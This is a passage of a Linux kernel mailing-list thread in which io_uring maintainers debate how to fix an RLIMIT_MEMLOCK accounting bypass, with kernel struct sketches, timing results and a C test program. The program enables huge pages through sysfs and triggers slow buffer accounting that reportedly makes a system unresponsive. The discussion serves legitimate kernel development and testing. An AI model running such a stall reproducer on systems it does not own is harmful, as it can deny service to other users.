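Purely as an illustration, one possible shape of that shared object
(names are made up, and this glosses over what happens when two rings
that already have their own object get wired together):

#include <linux/mutex.h>
#include <linux/refcount.h>
#include <linux/slab.h>
#include <linux/xarray.h>

struct io_buf_acct {
	refcount_t	refs;	/* rings sharing this accounting state */
	struct mutex	lock;	/* serialises read-modify-write of hpages */
	struct xarray	hpages;	/* compound head -> nr of imus using it */
};

static struct io_buf_acct *io_buf_acct_alloc(void)
{
	struct io_buf_acct *acct = kzalloc(sizeof(*acct), GFP_KERNEL);

	if (acct) {
		refcount_set(&acct->refs, 1);
		mutex_init(&acct->lock);
		xa_init(&acct->hpages);
	}
	return acct;
}

/* on clone, the destination ring takes a reference to the same object */
static void io_buf_acct_get(struct io_buf_acct *acct)
{
	refcount_inc(&acct->refs);
}

static void io_buf_acct_put(struct io_buf_acct *acct)
{
	if (refcount_dec_and_test(&acct->refs)) {
		xa_destroy(&acct->hpages);
		kfree(acct);
	}
}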

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 12:05         ` Pavel Begunkov
@ 2026-01-20 17:03           ` Jens Axboe
  2026-01-20 21:45             ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-20 17:03 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 5:05 AM, Pavel Begunkov wrote:
> On 1/20/26 07:05, Yuhao Jiang wrote:
>> Hi Jens,
>>
>> On Mon, Jan 19, 2026 at 5:40 PM Jens Axboe <axboe@kernel.dk> wrote:
>>>
>>> On 1/19/26 4:34 PM, Yuhao Jiang wrote:
>>>> On Mon, Jan 19, 2026 at 11:03 AM Jens Axboe <axboe@kernel.dk> wrote:
>>>>>
>>>>> On 1/19/26 12:10 AM, Yuhao Jiang wrote:
>>>>>> The trade-off is that memory accounting may be overestimated when
>>>>>> multiple buffers share compound pages, but this is safe and prevents
>>>>>> the security issue.
>>>>>
>>>>> I'd be worried that this would break existing setups. We obviously need
>>>>> to get the unmap accounting correct, but in terms of practicality, any
>>>>> user of registered buffers will have had to bump distro limits manually
>>>>> anyway, and in that case it's usually just set very high. Otherwise
>>>>> there's very little you can do with it.
>>>>>
>>>>> How about something else entirely - just track the accounted pages on
>>>>> the side. If we ref those, then we can ensure that if a huge page is
>>>>> accounted, it's only unaccounted when all existing "users" of it have
>>>>> gone away. That means if you drop parts of it, it'll remain accounted.
>>>>>
>>>>> Something totally untested like the below... Yes it's not a trivial
>>>>> amount of code, but it is actually fairly trivial code.
>>>>
>>>> Thanks, this approach makes sense. I'll send a v3 based on this.
>>>
>>> Great, thanks! I think the key is tracking this on the side, and then
>>> a ref to tell when it's safe to unaccount it. The rest is just
>>> implementation details.
>>>
>>> -- 
>>> Jens Axboe
>>>
>>
>> I've been implementing the xarray-based ref tracking approach for v3.
>> While working on it, I discovered an issue with buffer cloning.
>>
>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>
>> The per-context xarray can't coordinate across clones - each context
>> tracks its own refcount independently. I think we either need a global
>> xarray (shared across all contexts), or just go back to v2. What do
>> you think?
> 
> The Jens' diff is functionally equivalent to your v1 and has
> exactly same problems. Global tracking won't work well.

Why not? My thinking was that we just use xa_lock() for this, with
a global xarray. It's not like register+unregister is a high frequency
thing. And if they are, then we've got much bigger problems than the
single lock as the runtime complexity isn't ideal.

-- 
Jens Axboe


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 17:03           ` Jens Axboe
@ 2026-01-20 21:45             ` Pavel Begunkov
  2026-01-21 14:58               ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-20 21:45 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 17:03, Jens Axboe wrote:
> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>> On 1/20/26 07:05, Yuhao Jiang wrote:
...
>>>
>>> I've been implementing the xarray-based ref tracking approach for v3.
>>> While working on it, I discovered an issue with buffer cloning.
>>>
>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>
>>> The per-context xarray can't coordinate across clones - each context
>>> tracks its own refcount independently. I think we either need a global
>>> xarray (shared across all contexts), or just go back to v2. What do
>>> you think?
>>
>> The Jens' diff is functionally equivalent to your v1 and has
>> exactly same problems. Global tracking won't work well.
> 
> Why not? My thinking was that we just use xa_lock() for this, with
> a global xarray. It's not like register+unregister is a high frequency
> thing. And if they are, then we've got much bigger problems than the
> single lock as the runtime complexity isn't ideal.

1. There could be quite a lot of entries even for a single ring with
a realistic amount of memory. If lots of threads start up at the same
time taking it in a loop, it might become a choking point for large
systems. It should be even more spectacular on some NUMA setups.

2. Most likely it'll further relax accounting (i.e. a one-way road),
and I don't believe that's the right thing. It could even be
unexpected if consolidated without any explicit communication between
rings (like buffer cloning).

3. Map keys will need to be {page, user, mm}, so I suspect the
implementation is not going to be exactly trivial either way. Maybe
some nested xarrays plus something for counting middle-layer entries.
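
Purely as an illustration, one reading of that nested idea (made-up
names; the user would presumably have to become part of the key or of
the middle-layer object as well):

#include <linux/mm_types.h>
#include <linux/xarray.h>

/* outer map: (unsigned long)mm -> struct io_mm_acct * */
static DEFINE_XARRAY(io_acct_by_mm);

struct io_mm_acct {
	struct mm_struct *mm;		/* owner of this middle layer */
	unsigned long	nr_entries;	/* tracked hpages; free when 0 */
	struct xarray	hpages;		/* compound head -> refcount */
};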

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 21:45             ` Pavel Begunkov
@ 2026-01-21 14:58               ` Jens Axboe
  2026-01-22 11:43                 ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-21 14:58 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 2:45 PM, Pavel Begunkov wrote:
> On 1/20/26 17:03, Jens Axboe wrote:
>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>> On 1/20/26 07:05, Yuhao Jiang wrote:
> ...
>>>>
>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>> While working on it, I discovered an issue with buffer cloning.
>>>>
>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>
>>>> The per-context xarray can't coordinate across clones - each context
>>>> tracks its own refcount independently. I think we either need a global
>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>> you think?
>>>
>>> The Jens' diff is functionally equivalent to your v1 and has
>>> exactly same problems. Global tracking won't work well.
>>
>> Why not? My thinking was that we just use xa_lock() for this, with
>> a global xarray. It's not like register+unregister is a high frequency
>> thing. And if they are, then we've got much bigger problems than the
>> single lock as the runtime complexity isn't ideal.
> 
> 1. There could be quite a lot of entries even for a single ring
> with realistic amount of memory. If lots of threads start up
> at the same time taking it in a loop, it might become a chocking
> point for large systems. Should be even more spectacular for
> some numa setups.

I already briefly touched on that earlier, for sure not going to be of
any practical concern.

> 2. Most likely it'll further relax accounting (i.e. one way
> road), and I don't believe that's the right thing. Could even
> be unexpected if consolidated w/o any explicit communication
> b/w rings (like buffer cloning).

Well the aim is to make the accounting actually correct.

> 3. Map keys will need to be {page, user, mm}, so I suspect
> impl is not going to be exactly trivial either way. Maybe some
> nested xarrays + something for counting middle layer entries.

Honestly I think the xarray just needs to go into struct user_struct.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-21 14:58               ` Jens Axboe
@ 2026-01-22 11:43                 ` Pavel Begunkov
  2026-01-22 17:47                   ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-22 11:43 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/21/26 14:58, Jens Axboe wrote:
> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>> On 1/20/26 17:03, Jens Axboe wrote:
>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>> ...
>>>>>
>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>
>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>
>>>>> The per-context xarray can't coordinate across clones - each context
>>>>> tracks its own refcount independently. I think we either need a global
>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>> you think?
>>>>
>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>> exactly same problems. Global tracking won't work well.
>>>
>>> Why not? My thinking was that we just use xa_lock() for this, with
>>> a global xarray. It's not like register+unregister is a high frequency
>>> thing. And if they are, then we've got much bigger problems than the
>>> single lock as the runtime complexity isn't ideal.
>>
>> 1. There could be quite a lot of entries even for a single ring
>> with realistic amount of memory. If lots of threads start up
>> at the same time taking it in a loop, it might become a chocking
>> point for large systems. Should be even more spectacular for
>> some numa setups.
> 
> I already briefly touched on that earlier, for sure not going to be of
> any practical concern.

A modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for
the xarray business, that's 50-100ms. It's all serialised, so multiply
by the number of CPUs/threads, e.g. 10-100, and that's 0.5-10s. Account
for sky-high spinlock contention and it jumps again, and there can be
more memory / CPUs / NUMA nodes. I'm not saying that it's worse than
the current O(n^2) - I have a test program that borderline hangs the
system.

Look, I don't care what it ends up being, whether it stutters or blows
up the kernel. I only took a quick look since you pinged me and were
asking "why not". If you don't want to consider my reasoning, then as
the maintainer you can merge whatever you like, and it'll be easier for
me as I won't be wasting more time.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 11:43                 ` Pavel Begunkov
@ 2026-01-22 17:47                   ` Jens Axboe
  2026-01-22 21:51                     ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-22 17:47 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 4:43 AM, Pavel Begunkov wrote:
> On 1/21/26 14:58, Jens Axboe wrote:
>> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>>> On 1/20/26 17:03, Jens Axboe wrote:
>>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>>> ...
>>>>>>
>>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>>
>>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>>
>>>>>> The per-context xarray can't coordinate across clones - each context
>>>>>> tracks its own refcount independently. I think we either need a global
>>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>>> you think?
>>>>>
>>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>>> exactly same problems. Global tracking won't work well.
>>>>
>>>> Why not? My thinking was that we just use xa_lock() for this, with
>>>> a global xarray. It's not like register+unregister is a high frequency
>>>> thing. And if they are, then we've got much bigger problems than the
>>>> single lock as the runtime complexity isn't ideal.
>>>
>>> 1. There could be quite a lot of entries even for a single ring
>>> with realistic amount of memory. If lots of threads start up
>>> at the same time taking it in a loop, it might become a chocking
>>> point for large systems. Should be even more spectacular for
>>> some numa setups.
>>
>> I already briefly touched on that earlier, for sure not going to be of
>> any practical concern.
> 
> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
> xarray business, that's 50-100ms. It's all serialised, so multiply by
> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
> high spinlock contention, and it jumps again, and there can be more
> memory / CPUs / numa nodes. Not saying that it's worse than the
> current O(n^2), I have a test program that borderline hangs the
> system.

It's definitely not worse than the existing system, which is why I don't
think it's a big deal. Nobody has ever complained about time to register
buffers. It's inherently a slow path, and quite slow at that depending
on the use case. Out of curiosity, I ran some silly testing on
registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
512GB registered in total for the 32 case. Before is the current kernel,
after is with per-user xarray accounting:

before

nthreads 1:      646 msec
nthreads 2:      888 msec
nthreads 4:      864 msec
nthreads 8:     1450 msec
nthreads 16:    2890 msec
nthreads 32:    4410 msec

after

nthreads 1:      650 msec
nthreads 2:      888 msec
nthreads 4:      892 msec
nthreads 8:     1270 msec
nthreads 16:    2430 msec
nthreads 32:    4160 msec

This includes registering buffers, cloning all of them to another
ring, and unregistering them, and nowhere is locking scalability an
issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
no, I strongly believe this isn't an issue.

IOW, accurate accounting is cheaper than the stuff we have now. None of
them are super cheap. Does it matter? I really don't think so, or people
would've complained already. The only complaint I got on these kinds of
things was for cloning, which did get fixed up some releases ago.

> Look, I don't care what it'd be, whether it stutters or blows up the
> kernel, I only took a quick look since you pinged me and was asking
> "why not". If you don't want to consider my reasoning, as the
> maintainer you can merge whatever you like, and it'll be easier for
> me as I won't be wasting more time.

I do consider your reasoning, but you also need to consider mine rather
than assuming there's only one answer here, or that yours is invariably
the correct one and being stubborn about it. The above test obviously
isn't the end-all be-all of testing, but it would show if we had issues
with scaling to the extent that you assume.

Also worth considering that for these kinds of parallel setups, the
(by far) most common use case is threads. And hence you're going to be
banging on the shared mm anyway for a lot of these memory-related
setup operations.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 17:47                   ` Jens Axboe
@ 2026-01-22 21:51                     ` Pavel Begunkov
  2026-01-23 14:26                       ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-22 21:51 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 17:47, Jens Axboe wrote:
> On 1/22/26 4:43 AM, Pavel Begunkov wrote:
>> On 1/21/26 14:58, Jens Axboe wrote:
>>> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>>>> On 1/20/26 17:03, Jens Axboe wrote:
>>>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>>>> ...
>>>>>>>
>>>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>>>
>>>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>>>
>>>>>>> The per-context xarray can't coordinate across clones - each context
>>>>>>> tracks its own refcount independently. I think we either need a global
>>>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>>>> you think?
>>>>>>
>>>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>>>> exactly same problems. Global tracking won't work well.
>>>>>
>>>>> Why not? My thinking was that we just use xa_lock() for this, with
>>>>> a global xarray. It's not like register+unregister is a high frequency
>>>>> thing. And if they are, then we've got much bigger problems than the
>>>>> single lock as the runtime complexity isn't ideal.
>>>>
>>>> 1. There could be quite a lot of entries even for a single ring
>>>> with realistic amount of memory. If lots of threads start up
>>>> at the same time taking it in a loop, it might become a chocking
>>>> point for large systems. Should be even more spectacular for
>>>> some numa setups.
>>>
>>> I already briefly touched on that earlier, for sure not going to be of
>>> any practical concern.
>>
>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>> high spinlock contention, and it jumps again, and there can be more
>> memory / CPUs / numa nodes. Not saying that it's worse than the
>> current O(n^2), I have a test program that borderline hangs the
>> system.
> 
> It's definitely not worse than the existing system, which is why I don't
> think it's a big deal. Nobody has ever complained about time to register
> buffers. It's inherently a slow path, and quite slow at that depending
> on the use case. Out of curiosity, I ran some stilly testing on
> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
> 512GB registered in total for the 32 case. Before is the current kernel,
> after is with per-user xarray accounting:
> 
> before
> 
> nthreads 1:      646 msec
> nthreads 2:      888 msec
> nthreads 4:      864 msec
> nthreads 8:     1450 msec
> nthreads 16:    2890 msec
> nthreads 32:    4410 msec
> 
> after
> 
> nthreads 1:      650 msec
> nthreads 2:      888 msec
> nthreads 4:      892 msec
> nthreads 8:     1270 msec
> nthreads 16:    2430 msec
> nthreads 32:    4160 msec
> 
> This includes both registering buffers, cloning all of them to another
> ring, and unregistering times, and nowhere is locking scalability an
> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
> no, I strongly believe this isn't an issue.
> 
> IOW, accurate accounting is cheaper than the stuff we have now. None of
> them are super cheap. Does it matter? I really don't think so, or people
> would've complained already. The only complaint I got on these kinds of
> things was for cloning, which did get fixed up some releases ago.

You need compound pages:

echo always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled

And use update() instead of register(), as the accounting dedup for
registration is broken/disabled. For the current kernel:

Single threaded:
1x1G: 7.5s
2x1G: 45s
4x1G: 190s

16x should be ~3000s, not going to run it. Uninterruptible and no
cond_resched, so spawn NR_CPUS threads and the system is completely
unresponsive (I guess it depends on the preemption mode).

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 21:51                     ` Pavel Begunkov
@ 2026-01-23 14:26                       ` Pavel Begunkov
  2026-01-23 14:50                         ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-23 14:26 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 21:51, Pavel Begunkov wrote:
...
>>>> I already briefly touched on that earlier, for sure not going to be of
>>>> any practical concern.
>>>
>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>> high spinlock contention, and it jumps again, and there can be more
>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>> current O(n^2), I have a test program that borderline hangs the
>>> system.
>>
>> It's definitely not worse than the existing system, which is why I don't
>> think it's a big deal. Nobody has ever complained about time to register
>> buffers. It's inherently a slow path, and quite slow at that depending
>> on the use case. Out of curiosity, I ran some stilly testing on
>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>> 512GB registered in total for the 32 case. Before is the current kernel,
>> after is with per-user xarray accounting:
>>
>> before
>>
>> nthreads 1:      646 msec
>> nthreads 2:      888 msec
>> nthreads 4:      864 msec
>> nthreads 8:     1450 msec
>> nthreads 16:    2890 msec
>> nthreads 32:    4410 msec
>>
>> after
>>
>> nthreads 1:      650 msec
>> nthreads 2:      888 msec
>> nthreads 4:      892 msec
>> nthreads 8:     1270 msec
>> nthreads 16:    2430 msec
>> nthreads 32:    4160 msec
>>
>> This includes both registering buffers, cloning all of them to another
>> ring, and unregistering times, and nowhere is locking scalability an
>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>> no, I strongly believe this isn't an issue.
>>
>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>> them are super cheap. Does it matter? I really don't think so, or people
>> would've complained already. The only complaint I got on these kinds of
>> things was for cloning, which did get fixed up some releases ago.
> 
> You need compound pages
> 
> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
> 
> And use update() instead of register() as accounting dedup for
> registration is broken-disabled. For the current kernel:
> 
> Single threaded:
> 1x1G: 7.5s
> 2x1G: 45s
> 4x1G: 190s
> 
> 16x should be ~3000s, not going to run it. Uninterruptible and no
> cond_resched, so spawn NR_CPUS threads and the system is completely
> unresponsive (I guess it depends on the preemption mode).

The program is below for reference, but it's trivial. THP setting
is done inside for convenience. There are ways to make the runtime
even worse, but that should be enough.


#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include "liburing.h"

#define NUM_THREADS 1
#define BUFFER_SIZE (1024UL * 1024 * 1024)
#define MAX_IOVS 64

static int num_iovs = 1;
static void *buffer;
static pthread_barrier_t barrier;

static void *thread_func(void *arg)
{
	struct io_uring ring;
	struct iovec iov[MAX_IOVS];
	int th_idx = (long)arg;
	int ret, i;

	for (i = 0; i < MAX_IOVS; i++) {
		iov[i].iov_base = buffer + i * BUFFER_SIZE;
		iov[i].iov_len  = BUFFER_SIZE;
	}

	ret = io_uring_queue_init(8, &ring, 0);
	if (ret) {
		fprintf(stderr, "ring init failed: %i\n", ret);
		return NULL;
	}

	ret = io_uring_register_buffers_sparse(&ring, MAX_IOVS);
	if (ret < 0) {
		fprintf(stderr, "reg sparse failed\n");
		return NULL;
	}

	pthread_barrier_wait(&barrier);

	ret = io_uring_register_buffers_update_tag(&ring, 0, iov, NULL, num_iovs);
	if (ret < 0)
		fprintf(stderr, "buffer update failed: %i\n", ret);

	printf("thread %i finished\n", th_idx);
	io_uring_queue_exit(&ring);
	return NULL;
}

int main(int argc, char **argv)
{
	pthread_t threads[NUM_THREADS];
	int sys_fd;
	int ret;

	if (argc != 2) {
		fprintf(stderr, "invalid number of arguments\n");
		return 1;
	}
	num_iovs = strtoul(argv[1], NULL, 0);
	printf("register %i GB, num threads %i\n", num_iovs, NUM_THREADS);

	// always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
	sys_fd = open("/sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled", O_RDWR);
	if (sys_fd < 0) {
		fprintf(stderr, "thp sys open failed %i\n", errno);
		return 1;
	}

	const char str[] = "always";
	ret = write(sys_fd, str, sizeof(str));
	if (ret != sizeof(str)) {
		fprintf(stderr, "thp sys write failed %i\n", errno);
		return 1;
	}

	buffer = aligned_alloc(64 * 1024, BUFFER_SIZE * num_iovs);
	if (!buffer) {
		fprintf(stderr, "allocation failed\n");
		return 1;
	}
	memset(buffer, 0, BUFFER_SIZE * num_iovs);

	pthread_barrier_init(&barrier, NULL, NUM_THREADS);
	for (long i = 0; i < NUM_THREADS; i++) {
		ret = pthread_create(&threads[i], NULL, thread_func, (void *)i);
		if (ret) {
			fprintf(stderr, "pthread_create failed for thread %ld\n", i);
			return 1;
		}
	}

	for (int i = 0; i < NUM_THREADS; i++)
		pthread_join(threads[i], NULL);
	pthread_barrier_destroy(&barrier);
	free(buffer);
	return 0;
}

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 14:26                       ` Pavel Begunkov
@ 2026-01-23 14:50                         ` Jens Axboe
  2026-01-23 15:04                           ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 14:50 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 7:26 AM, Pavel Begunkov wrote:
> On 1/22/26 21:51, Pavel Begunkov wrote:
> ...
>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>> any practical concern.
>>>>
>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>> high spinlock contention, and it jumps again, and there can be more
>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>> current O(n^2), I have a test program that borderline hangs the
>>>> system.
>>>
>>> It's definitely not worse than the existing system, which is why I don't
>>> think it's a big deal. Nobody has ever complained about time to register
>>> buffers. It's inherently a slow path, and quite slow at that depending
>>> on the use case. Out of curiosity, I ran some stilly testing on
>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>> after is with per-user xarray accounting:
>>>
>>> before
>>>
>>> nthreads 1:      646 msec
>>> nthreads 2:      888 msec
>>> nthreads 4:      864 msec
>>> nthreads 8:     1450 msec
>>> nthreads 16:    2890 msec
>>> nthreads 32:    4410 msec
>>>
>>> after
>>>
>>> nthreads 1:      650 msec
>>> nthreads 2:      888 msec
>>> nthreads 4:      892 msec
>>> nthreads 8:     1270 msec
>>> nthreads 16:    2430 msec
>>> nthreads 32:    4160 msec
>>>
>>> This includes both registering buffers, cloning all of them to another
>>> ring, and unregistering times, and nowhere is locking scalability an
>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>> no, I strongly believe this isn't an issue.
>>>
>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>> them are super cheap. Does it matter? I really don't think so, or people
>>> would've complained already. The only complaint I got on these kinds of
>>> things was for cloning, which did get fixed up some releases ago.
>>
>> You need compound pages
>>
>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>
>> And use update() instead of register() as accounting dedup for
>> registration is broken-disabled. For the current kernel:
>>
>> Single threaded:
>> 1x1G: 7.5s
>> 2x1G: 45s
>> 4x1G: 190s
>>
>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>> cond_resched, so spawn NR_CPUS threads and the system is completely
>> unresponsive (I guess it depends on the preemption mode).
> The program is below for reference, but it's trivial. THP setting
> is done inside for convenience. There are ways to make the runtime
> even worse, but that should be enough.

Thanks for sending that. Ran it on the same box, on current -git and
with user_struct xarray accounting. Modified it so that 2nd arg is
number of threads, for easy running:

current -git

axboe@r7625 ~> cat /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
[always] inherit madvise never
axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in  178.91 millis    fish           external
   usr time    9.82 millis  313.00 micros    9.51 millis
   sys time  161.83 millis  149.00 micros  161.68 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  638.49 millis    fish           external
   usr time    0.03 secs    285.00 micros    0.03 secs
   sys time    1.14 secs    135.00 micros    1.14 secs

register 4 GB, num threads 4

________________________________________________________
Executed in    2.17 secs    fish           external
   usr time    0.05 secs  314.00 micros    0.05 secs
   sys time    6.31 secs  150.00 micros    6.31 secs

register 8 GB, num threads 8

________________________________________________________
Executed in    4.97 secs    fish           external
   usr time    0.12 secs  299.00 micros    0.12 secs
   sys time   28.97 secs  142.00 micros   28.97 secs

register 16 GB, num threads 16

________________________________________________________
Executed in   10.34 secs    fish           external
   usr time    0.20 secs  294.00 micros    0.20 secs
   sys time  126.42 secs  140.00 micros  126.42 secs


-git + user_struct xarray for accounting

axboe@r7625 ~> cat /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
[always] inherit madvise never
axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in   54.05 millis    fish           external
   usr time   10.66 millis  327.00 micros   10.34 millis
   sys time   41.60 millis  259.00 micros   41.34 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  105.70 millis    fish           external
   usr time   34.38 millis  206.00 micros   34.17 millis
   sys time   68.55 millis  206.00 micros   68.35 millis

register 4 GB, num threads 4

________________________________________________________
Executed in  214.72 millis    fish           external
   usr time   48.10 millis  193.00 micros   47.91 millis
   sys time  182.25 millis  193.00 micros  182.06 millis

register 8 GB, num threads 8

________________________________________________________
Executed in  441.96 millis    fish           external
   usr time  123.26 millis  195.00 micros  123.07 millis
   sys time  568.20 millis  195.00 micros  568.00 millis

register 16 GB, num threads 16

________________________________________________________
Executed in  917.70 millis    fish           external
   usr time    0.17 secs    202.00 micros    0.17 secs
   sys time    2.48 secs    202.00 micros    2.48 secs


-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 14:50                         ` Jens Axboe
@ 2026-01-23 15:04                           ` Jens Axboe
  2026-01-23 16:52                             ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 15:04 UTC (permalink / raw)
